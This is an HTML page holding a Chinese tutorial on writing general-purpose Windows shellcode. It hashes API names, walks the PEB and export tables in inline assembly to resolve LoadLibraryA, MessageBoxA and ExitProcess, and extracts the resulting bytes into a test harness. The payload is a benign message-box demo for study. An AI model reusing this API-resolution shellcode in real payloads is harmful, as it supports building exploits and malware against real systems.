<!DOCTYPE html>
<html>
<head>
<title>3.2Calculate digest of function name for general shellcode</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
/* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
/* Author: Nicolas Hery - http://nicolashery.com */
/* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
/* Source: https://github.com/nicolahery/markdownpad-github */

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: Helvetica, arial, freesans, clean, sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
<style type="text/css">
.highlight  { background: #ffffff; }
.highlight .c { color: #999988; font-style: italic } /* Comment */
.highlight .err { color: #a61717; background-color: #e3d2d2 } /* Error */
.highlight .k { font-weight: bold } /* Keyword */
.highlight .o { font-weight: bold } /* Operator */
.highlight .cm { color: #999988; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #999999; font-weight: bold } /* Comment.Preproc */
.highlight .c1 { color: #999988; font-style: italic } /* Comment.Single */
.highlight .cs { color: #999999; font-weight: bold; font-style: italic } /* Comment.Special */
.highlight .gd { color: #000000; background-color: #ffdddd } /* Generic.Deleted */
.highlight .gd .x { color: #000000; background-color: #ffaaaa } /* Generic.Deleted.Specific */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #aa0000 } /* Generic.Error */
.highlight .gh { color: #999999 } /* Generic.Heading */
.highlight .gi { color: #000000; background-color: #ddffdd } /* Generic.Inserted */
.highlight .gi .x { color: #000000; background-color: #aaffaa } /* Generic.Inserted.Specific */
.highlight .go { color: #888888 } /* Generic.Output */
.highlight .gp { color: #555555 } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #aaaaaa } /* Generic.Subheading */
.highlight .gt { color: #aa0000 } /* Generic.Traceback */
.highlight .kc { font-weight: bold } /* Keyword.Constant */
.highlight .kd { font-weight: bold } /* Keyword.Declaration */
.highlight .kp { font-weight: bold } /* Keyword.Pseudo */
.highlight .kr { font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #445588; font-weight: bold } /* Keyword.Type */
.highlight .m { color: #009999 } /* Literal.Number */
.highlight .s { color: #d14 } /* Literal.String */
.highlight .na { color: #008080 } /* Name.Attribute */
.highlight .nb { color: #0086B3 } /* Name.Builtin */
.highlight .nc { color: #445588; font-weight: bold } /* Name.Class */
.highlight .no { color: #008080 } /* Name.Constant */
.highlight .ni { color: #800080 } /* Name.Entity */
.highlight .ne { color: #990000; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #990000; font-weight: bold } /* Name.Function */
.highlight .nn { color: #555555 } /* Name.Namespace */
.highlight .nt { color: #000080 } /* Name.Tag */
.highlight .nv { color: #008080 } /* Name.Variable */
.highlight .ow { font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mf { color: #009999 } /* Literal.Number.Float */
.highlight .mh { color: #009999 } /* Literal.Number.Hex */
.highlight .mi { color: #009999 } /* Literal.Number.Integer */
.highlight .mo { color: #009999 } /* Literal.Number.Oct */
.highlight .sb { color: #d14 } /* Literal.String.Backtick */
.highlight .sc { color: #d14 } /* Literal.String.Char */
.highlight .sd { color: #d14 } /* Literal.String.Doc */
.highlight .s2 { color: #d14 } /* Literal.String.Double */
.highlight .se { color: #d14 } /* Literal.String.Escape */
.highlight .sh { color: #d14 } /* Literal.String.Heredoc */
.highlight .si { color: #d14 } /* Literal.String.Interpol */
.highlight .sx { color: #d14 } /* Literal.String.Other */
.highlight .sr { color: #009926 } /* Literal.String.Regex */
.highlight .s1 { color: #d14 } /* Literal.String.Single */
.highlight .ss { color: #990073 } /* Literal.String.Symbol */
.highlight .bp { color: #999999 } /* Name.Builtin.Pseudo */
.highlight .vc { color: #008080 } /* Name.Variable.Class */
.highlight .vg { color: #008080 } /* Name.Variable.Global */
.highlight .vi { color: #008080 } /* Name.Variable.Instance */
.highlight .il { color: #009999 } /* Literal.Number.Integer.Long */
.pl-c {
    color: #969896;
}

.pl-c1,.pl-mdh,.pl-mm,.pl-mp,.pl-mr,.pl-s1 .pl-v,.pl-s3,.pl-sc,.pl-sv {
    color: #0086b3;
}

.pl-e,.pl-en {
    color: #795da3;
}

.pl-s1 .pl-s2,.pl-smi,.pl-smp,.pl-stj,.pl-vo,.pl-vpf {
    color: #333;
}

.pl-ent {
    color: #63a35c;
}

.pl-k,.pl-s,.pl-st {
    color: #a71d5d;
}

.pl-pds,.pl-s1,.pl-s1 .pl-pse .pl-s2,.pl-sr,.pl-sr .pl-cce,.pl-sr .pl-sra,.pl-sr .pl-sre,.pl-src,.pl-v {
    color: #df5000;
}

.pl-id {
    color: #b52a1d;
}

.pl-ii {
    background-color: #b52a1d;
    color: #f8f8f8;
}

.pl-sr .pl-cce {
    color: #63a35c;
    font-weight: bold;
}

.pl-ml {
    color: #693a17;
}

.pl-mh,.pl-mh .pl-en,.pl-ms {
    color: #1d3e81;
    font-weight: bold;
}

.pl-mq {
    color: #008080;
}

.pl-mi {
    color: #333;
    font-style: italic;
}

.pl-mb {
    color: #333;
    font-weight: bold;
}

.pl-md,.pl-mdhf {
    background-color: #ffecec;
    color: #bd2c00;
}

.pl-mdht,.pl-mi1 {
    background-color: #eaffea;
    color: #55a532;
}

.pl-mdr {
    color: #795da3;
    font-weight: bold;
}

.pl-mo {
    color: #1d3e81;
}
.task-list {
padding-left:10px;
margin-bottom:0;
}

.task-list li {
    margin-left: 20px;
}

.task-list-item {
list-style-type:none;
padding-left:10px;
}

.task-list-item label {
font-weight:400;
}

.task-list-item.enabled label {
cursor:pointer;
}

.task-list-item+.task-list-item {
margin-top:3px;
}

.task-list-item-checkbox {
display:inline-block;
margin-left:-20px;
margin-right:3px;
vertical-align:1px;
}
</style>
</head>
<body>
<h1 id="calculate-digest-of-function-name-for-general-shellcode">Calculate digest of function name for general shellcode</h1>
<p><strong>Author：wnagzihxain<br>Mail：tudouboom@163.com</strong></p>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;

DWORD GetHash(char *fun_name)
{
    DWORD digest = 0;
    while(*fun_name)
    {
        digest = ((digest&lt;&lt;25) | (digest&gt;&gt;7));
        digest += *fun_name ;
        fun_name++;
    }
    return digest;
}

int main()
{
    DWORD hash;
    hash = GetHash(&quot;MessageBoxA&quot;);
    printf(&quot;result of hash is %.8x\n&quot;, hash);
    return 0;
}
</code></pre><p>这是用于hash函数名的代码</p>
<pre><code>int main()
{    
    _asm{
            nop
            nop
            nop
            nop
            nop
            CLD                    ; clear flag DF
            ;store hash
            push 0x1e380a6a        ;hash of MessageBoxA
            push 0x4fd18963        ;hash of ExitProcess
            push 0x0c917432        ;hash of LoadLibraryA
            mov esi,esp            ; esi = addr of first function hash 
            lea edi,[esi-0xc]    ; edi = addr to start writing function 

            ; make some stack space
            xor ebx,ebx
            mov bh, 0x04              
            sub esp, ebx 

            ; push a pointer to &quot;user32&quot; onto stack 
            mov bx, 0x3233         ; rest of ebx is null 
            push ebx 
            push 0x72657375 
            push esp 
            xor edx,edx

        ; find base addr of kernel32.dll 
            mov ebx, fs:[edx + 0x30]     ; ebx = address of PEB 
            mov ecx, [ebx + 0x0c]         ; ecx = pointer to loader data 
            mov ecx, [ecx + 0x1c]         ; ecx = first entry in initialisation order list 
            mov ecx, [ecx]                 ; ecx = second entry in list (kernel32.dll) 
            mov ebp, [ecx + 0x08]         ; ebp = base address of kernel32.dll 

        find_lib_functions: 
            lodsd                     ; load next hash into al and increment esi 
            cmp eax, 0x1e380a6a        ; hash of MessageBoxA - trigger 
                                    ; LoadLibrary(&quot;user32&quot;) 
            jne find_functions 
            xchg eax, ebp             ; save current hash 
            call [edi - 0x8]         ; LoadLibraryA 
            xchg eax, ebp             ; restore current hash, and update ebp 
                                    ; with base address of user32.dll 

        find_functions: 
            pushad                         ; preserve registers 
            mov eax, [ebp + 0x3c]        ; eax = start of PE header 
            mov ecx, [ebp + eax + 0x78]    ; ecx = relative offset of export table 
            add ecx, ebp                 ; ecx = absolute addr of export table 
            mov ebx, [ecx + 0x20]         ; ebx = relative offset of names table 
            add ebx, ebp                 ; ebx = absolute addr of names table 
            xor edi, edi                 ; edi will count through the functions 

        next_function_loop: 
            inc edi                     ; increment function counter 
            mov esi, [ebx + edi * 4]     ; esi = relative offset of current function name 
            add esi, ebp                 ; esi = absolute addr of current function name 
            cdq                         ; dl will hold hash (we know eax is small) 

        hash_loop: 
            movsx eax, byte ptr[esi]
            cmp al,ah
            jz compare_hash
            ror edx,7
            add edx,eax
            inc esi
            jmp hash_loop

        compare_hash:    
            cmp edx, [esp + 0x1c]         ; compare to the requested hash (saved on stack from pushad) 
            jnz next_function_loop 
            mov ebx, [ecx + 0x24]         ; ebx = relative offset of ordinals table 
            add ebx, ebp                 ; ebx = absolute addr of ordinals table 
            mov di, [ebx + 2 * edi]     ; di = ordinal number of matched function 
            mov ebx, [ecx + 0x1c]         ; ebx = relative offset of address table 
            add ebx, ebp                 ; ebx = absolute addr of address table 
            add ebp, [ebx + 4 * edi]     ; add to ebp (base addr of module) the 
                                        ; relative offset of matched function 
            xchg eax, ebp                 ; move func addr into eax 
            pop edi                     ; edi is last onto stack in pushad 
            stosd                         ; write function addr to [edi] and increment edi 
            push edi 
            popad                    ; restore registers 
                                     ; loop until we reach end of last hash 
            cmp eax,0x1e380a6a
            jne find_lib_functions 

        function_call:
            xor ebx,ebx
            push ebx            // cut string
            push 0x74736577
            push 0x6C696166        //push failwest
            mov eax,esp            //load address of failwest
            push ebx    
            push eax
            push eax
            push ebx
            call [edi - 0x04] ; //call MessageboxA
            push ebx
            call [edi - 0x08] ; // call ExitProcess
            nop
            nop
            nop
            nop
    }
    return 0;
}
</code></pre><p>这是最终的代码，用于搜索API地址</p>
<p>我们生成exe，然后载入OD，提取出汇编</p>
<pre><code>&quot;\x90&quot;//                        NOP
&quot;\xFC&quot;
&quot;\x68\x6A\x0A\x38\x1E&quot;//        PUSH 1E380A6A
&quot;\x68\x63\x89\xD1\x4F&quot;//        PUSH 4FD18963
&quot;\x68\x32\x74\x91\x0C&quot;//        PUSH 0C917432
&quot;\x8B\xF4&quot;//                    MOV ESI,ESP
&quot;\x8D\x7E\xF4&quot;//                LEA EDI,DWORD PTR DS:[ESI-C]
&quot;\x33\xDB&quot;//                    XOR EBX,EBX
&quot;\xB7\x04&quot;//                    MOV BH,4
&quot;\x2B\xE3&quot;//                    SUB ESP,EBX
&quot;\x66\xBB\x33\x32&quot;//            MOV BX,3233
&quot;\x53&quot;//                        PUSH EBX
&quot;\x68\x75\x73\x65\x72&quot;//        PUSH 72657375
&quot;\x54&quot;//                        PUSH ESP
&quot;\x33\xD2&quot;//                    XOR EDX,EDX
&quot;\x64\x8B\x5A\x30&quot;//            MOV EBX,DWORD PTR FS:[EDX+30]
&quot;\x8B\x4B\x0C&quot;//                MOV ECX,DWORD PTR DS:[EBX+C]
&quot;\x8B\x49\x1C&quot;//                MOV ECX,DWORD PTR DS:[ECX+1C]
&quot;\x8B\x09&quot;//                    MOV ECX,DWORD PTR DS:[ECX]
&quot;\x8B\x69\x08&quot;//                MOV EBP,DWORD PTR DS:[ECX+8]
&quot;\xAD&quot;//                        LODS DWORD PTR DS:[ESI]
&quot;\x3D\x6A\x0A\x38\x1E&quot;//        CMP EAX,1E380A6A
&quot;\x75\x05&quot;//                    JNZ SHORT popup_co.00401070
&quot;\x95&quot;//                        XCHG EAX,EBP
&quot;\xFF\x57\xF8&quot;//                CALL DWORD PTR DS:[EDI-8]
&quot;\x95&quot;//                        XCHG EAX,EBP
&quot;\x60&quot;//                        PUSHAD
&quot;\x8B\x45\x3C&quot;//                MOV EAX,DWORD PTR SS:[EBP+3C]
&quot;\x8B\x4C\x05\x78&quot;//            MOV ECX,DWORD PTR SS:[EBP+EAX+78]
&quot;\x03\xCD&quot;//                    ADD ECX,EBP
&quot;\x8B\x59\x20&quot;//                MOV EBX,DWORD PTR DS:[ECX+20]
&quot;\x03\xDD&quot;//                    ADD EBX,EBP
&quot;\x33\xFF&quot;//                    XOR EDI,EDI
&quot;\x47&quot;//                        INC EDI
&quot;\x8B\x34\xBB&quot;//                MOV ESI,DWORD PTR DS:[EBX+EDI*4]
&quot;\x03\xF5&quot;//                    ADD ESI,EBP
&quot;\x99&quot;//                        CDQ
&quot;\x0F\xBE\x06&quot;//                MOVSX EAX,BYTE PTR DS:[ESI]
&quot;\x3A\xC4&quot;//                    CMP AL,AH
&quot;\x74\x08&quot;//                    JE SHORT popup_co.00401097
&quot;\xC1\xCA\x07&quot;//                ROR EDX,7
&quot;\x03\xD0&quot;//                    ADD EDX,EAX
&quot;\x46&quot;//                        INC ESI
&quot;\xEB\xF1&quot;//                    JMP SHORT popup_co.00401088
&quot;\x3B\x54\x24\x1C&quot;//            CMP EDX,DWORD PTR SS:[ESP+1C]
&quot;\x75\xE4&quot;//                    JNZ SHORT popup_co.00401081
&quot;\x8B\x59\x24&quot;//                MOV EBX,DWORD PTR DS:[ECX+24]
&quot;\x03\xDD&quot;//                    ADD EBX,EBP
&quot;\x66\x8B\x3C\x7B&quot;//            MOV DI,WORD PTR DS:[EBX+EDI*2]
&quot;\x8B\x59\x1C&quot;//                MOV EBX,DWORD PTR DS:[ECX+1C]
&quot;\x03\xDD&quot;//                    ADD EBX,EBP
&quot;\x03\x2C\xBB&quot;//                ADD EBP,DWORD PTR DS:[EBX+EDI*4]
&quot;\x95&quot;//                        XCHG EAX,EBP
&quot;\x5F&quot;//                        POP EDI
&quot;\xAB&quot;//                        STOS DWORD PTR ES:[EDI]
&quot;\x57&quot;//                        PUSH EDI
&quot;\x61&quot;//                        POPAD
&quot;\x3D\x6A\x0A\x38\x1E&quot;//        CMP EAX,1E380A6A
&quot;\x75\xA9&quot;//                    JNZ SHORT popup_co.00401063
&quot;\x33\xDB&quot;//                    XOR EBX,EBX
&quot;\x53&quot;//                        PUSH EBX
&quot;\x68\x77\x65\x73\x74&quot;//        PUSH 74736577
&quot;\x68\x66\x61\x69\x6C&quot;//        PUSH 6C696166
&quot;\x8B\xC4&quot;//                    MOV EAX,ESP
&quot;\x53&quot;//                        PUSH EBX
&quot;\x50&quot;//                        PUSH EAX
&quot;\x50&quot;//                        PUSH EAX
&quot;\x53&quot;//                        PUSH EBX
&quot;\xFF\x57\xFC&quot;//                CALL DWORD PTR DS:[EDI-4]
&quot;\x53&quot;//                        PUSH EBX
&quot;\xFF\x57\xF8&quot;;//                CALL DWORD PTR DS:[EDI-8]
</code></pre><p>整理一下</p>
<pre><code>char popup_general[]=
&quot;\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C&quot;
&quot;\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53&quot;
&quot;\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B&quot;
&quot;\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95&quot;
&quot;\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59&quot;
&quot;\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A&quot;
&quot;\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75&quot;
&quot;\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03&quot;
&quot;\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB&quot;
&quot;\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50&quot;
&quot;\x53\xFF\x57\xFC\x53\xFF\x57\xF8&quot;;

void main()
{
    __asm
    {
        lea eax,popup_general
        push eax
        ret
    }
}
</code></pre>
</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
